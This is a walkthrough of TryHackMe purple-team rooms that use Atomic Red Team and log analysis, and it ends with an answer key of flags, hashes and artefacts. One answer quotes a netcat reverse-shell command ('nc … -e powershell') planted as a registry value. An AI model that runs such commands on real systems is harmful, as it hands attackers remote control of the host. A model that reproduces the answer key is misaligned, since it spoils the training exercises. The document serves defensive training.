We covered practical purple teaming by conducting threat emulation with Atomic Red Team and then measuring the impact of that emulation by investigating and analysing the resulting logs. We used the TryHackMe Atomic Bird Goes Purple #1 room, which is part of the SOC Level 2 track.
We also covered the answers for the TryHackMe Atomic Bird Goes Purple #2 room.
Purple Teaming & Threat Emulation
Threat emulation is invaluable for improving an organisation's cyber security posture and its security team's capability. Threat emulation is the process of simulating and replicating the tactics, techniques and procedures (TTPs) of selected threats (chosen according to the organisation's or team's needs and current maturity) in a controlled environment. This includes recreating attack scenarios in as much detail as possible so that each step of the attack chain can be used to improve detection, reveal gaps and weaknesses, and test the effectiveness of the implemented security controls.
This process can be done through various methods, including red teaming activities, penetration testing, and the use of tools. This room uses the Atomic Red Team project to simulate attacks.
A well-configured endpoint generates enough log data on its own for threat emulation tests. Additional detection tools increase visibility further, and many options exist; this room uses Aurora EDR and Sysmon to increase the visibility of each test and enrich the logs. The purpose of the exercises is to view the results of the tests as they are and to observe the activity details and artefacts, which are what detection engineering depends on.
You are expected to execute the given custom tests and then investigate the logs and system activity for each test. The most important outcome of the exercise is executing a test and following up on its actions right afterwards: investigating the logs, the file system and the registry. You must consider everything from both the Red and Blue perspectives to go Purple!
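The execute-then-investigate loop described above, as an added PowerShell example (it is not code from the TryHackMe room or from the Atomic Red Team project). It assumes the Invoke-AtomicRedTeam module is installed, that the room's custom atomics live under C:\AtomicRedTeam\atomics, and that Sysmon logs to its default operational channel; the test number T0004-1 is taken from the room, and the output paths are illustrative:

```powershell
# Added example, not the room's or the Atomic Red Team project's own code.
# Assumptions: Invoke-AtomicRedTeam is installed, the custom atomics are in
# C:\AtomicRedTeam\atomics, and Sysmon writes to Microsoft-Windows-Sysmon/Operational.
Import-Module Invoke-AtomicRedTeam -Force

$Technique  = 'T0004'          # room test T0004-1 (technique ID from the room)
$TestNumber = 1
$Atomics    = 'C:\AtomicRedTeam\atomics'   # assumed atomics folder
$ExecLog    = "$env:USERPROFILE\Desktop\atomic-exec.csv"   # illustrative path

# 1. Red perspective: read the test definition before running anything.
Invoke-AtomicTest $Technique -TestNumbers $TestNumber -ShowDetails -PathToAtomicsFolder $Atomics

# 2. Confirm prerequisites, fetching them if the test defines a get_prereq_command.
Invoke-AtomicTest $Technique -TestNumbers $TestNumber -CheckPrereqs -PathToAtomicsFolder $Atomics
Invoke-AtomicTest $Technique -TestNumbers $TestNumber -GetPrereqs   -PathToAtomicsFolder $Atomics

# 3. Record the start time so the log search is scoped to this emulation only, then execute.
$Start = Get-Date
Invoke-AtomicTest $Technique -TestNumbers $TestNumber -PathToAtomicsFolder $Atomics -ExecutionLogPath $ExecLog

# 4. Blue perspective: pull the Sysmon events produced since $Start.
#    Event IDs: 1 = process create, 11 = file create, 12/13 = registry key / value set.
$Sysmon = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1, 11, 12, 13
    StartTime = $Start
} -ErrorAction SilentlyContinue

$Sysmon |
    Select-Object TimeCreated, Id,
        @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0..3] -join ' | ' } } |
    Format-Table -AutoSize -Wrap

# Service installs (the kind of artefact a service-creation test leaves) are logged
# by the Service Control Manager in the System log as event 7045, not by Sysmon.
# EventData fields for 7045 are ServiceName, ImagePath, ServiceType, StartType, AccountName.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $Start } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated,
        @{ Name = 'Service';   Expression = { $_.Properties[0].Value } },
        @{ Name = 'ImagePath'; Expression = { $_.Properties[1].Value } }

# 5. Check what the test dropped on disk (the room's tests write to the Desktop),
#    then remove the artefacts with the test's own cleanup_command.
Get-ChildItem "$env:USERPROFILE\Desktop" | Where-Object LastWriteTime -ge $Start
Invoke-AtomicTest $Technique -TestNumbers $TestNumber -Cleanup -PathToAtomicsFolder $Atomics
```

Scoping every query to `$Start` is what keeps the investigation honest: it separates the events this one test produced from the background noise of the host, which is the same discipline you need when turning an observed artefact into a detection rule. Run `-Cleanup` only after you have finished collecting evidence, since it deletes the very files and registry values you are meant to examine.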
Threat Emulation Methodologies
MITRE ATT&CK
The MITRE ATT&CK Framework is an industry-standard knowledge base of adversary TTPs observed in real attacks and breaches. Threat emulation teams gain a lot from integrating ATT&CK into their engagements: it gives every emulated behaviour a shared identifier, which makes reporting and mapping mitigations to the tested behaviours far more efficient.
Atomic Red Team
Atomic Red Team is an open-source project that provides a framework for security testing and threat emulation. It consists of small, focused tests ("atomics"), each mapped to an ATT&CK technique, that can be used to simulate various types of attacks and security threats, such as malware behaviour, phishing and network compromise. Atomic Red Team aims to help security professionals assess the effectiveness of their organisation's security controls and incident response processes and identify areas for improvement.
TIBER-EU Framework
The Threat Intelligence-based Ethical Red Teaming (TIBER-EU) is the European framework developed to deliver controlled, bespoke, intelligence-led emulation testing on entities and organizations’ critical live production systems. It is meant to provide a guideline for stakeholders to test and improve cyber resilience through controlled adversary actions.
CTID Adversary Emulation Library
The Center for Threat-Informed Defense is a non-profit research and development organization operated by MITRE Engenuity. Its mission is to promote the practice of threat-informed defence. With this mission, they have curated an open-source adversary emulation plan library, allowing organisations to use the plans to evaluate their capabilities against real-world threats.
CALDERA
Definition
CALDERA™ is an open-source framework designed to run autonomous adversary emulation exercises efficiently. It enables users to emulate real-world attack scenarios and assess the effectiveness of their security defences.
Additionally, blue teamers can use CALDERA to perform automated incident response actions through deployed agents. This functionality helps identify TTPs that other security tools may not detect or prevent.
Check out the video below for a detailed explanation.
Room Answers | TryHackMe Atomic Bird Goes Purple #1
Use the required PowerShell command to retrieve the flag.
What is the flag?
THM{Emulation_is_fun_but_needs_focus_and_exploration}
What is the required command to clear all generated artefacts and restore the affected files from test T0123-4?
Invoke-AtomicTest T0123-4 -Cleanup
Execute test T0004-1 and open the document created on the Desktop.
What is the OS Build info?
10.0.17763 N/A Build 17763
Execute test T0004-2.
What is the flag?
THM{THM_Emulation_Room}
Execute test T0004-3.
Examine the logs; what is the failed command?
/bin/bash
Navigate the disk and drives, and open the shared folder.
What is the SHA256 value of the “.txt” document?
3CA9FB42ACF0A347BDFDC78E0435331BC458194E4BC7FBFFB255BC4CF02CDC1A
Execute the test T0005-1.
Re-calculate the SHA256 value of the document. What is the hash value?
626DBB861DCFF600DABEFCE7BF93F2C72C0F6462CC5729B963FC8242D7D43990
Execute test T0006-1.
Find the malicious history dump file. What is the flag?
THM{THM_analytics_to_exfiltration_with_NexGenHunt}
Execute test T0006-2.
Find the malicious system file modification activity. What is the flag?
THM{NextGenHunt.thm.jhn}
Room Answers | TryHackMe Atomic Bird Goes Purple #2
Execute test T0002-1 and open the document created on the Desktop.
Which PowerShell library file is detected?
YamlDotNet.xml
Now go to the atomics path and update the executed script to include all “bak” files.
What is the code snippet that needs to be added to the code?
,*.bak
Run the cleanup command for the test T0002-1 and re-execute the test.
Open the output file, and investigate the detected files.
What is the secret key?
L1LAFLHQ5peGsjh7Pee8wHFY1SBQHe85A1HZhVrK47Yf6cqmH3n8
Execute test T0002-2 and investigate logs.
What is the new account name?
Adminstrator
Execute test T0003-1.
What is the name of the created service?
thm-registered-service
Which image is used to set the registry value for the created service?
C:\Windows\system32\services.exe
Execute test T0003-2.
What is the ransom note?
THM{THM_Offline_Index_Emulation}
Execute test T0003-3.
What is the updated file extension?
.thm-jhn
Execute test T0003-4.
What is the assigned value of the malicious registry value?
nc 10.10.thm.jhn 4499 -e powershell
Video Walkthrough | TryHackMe Atomic Bird Goes Purple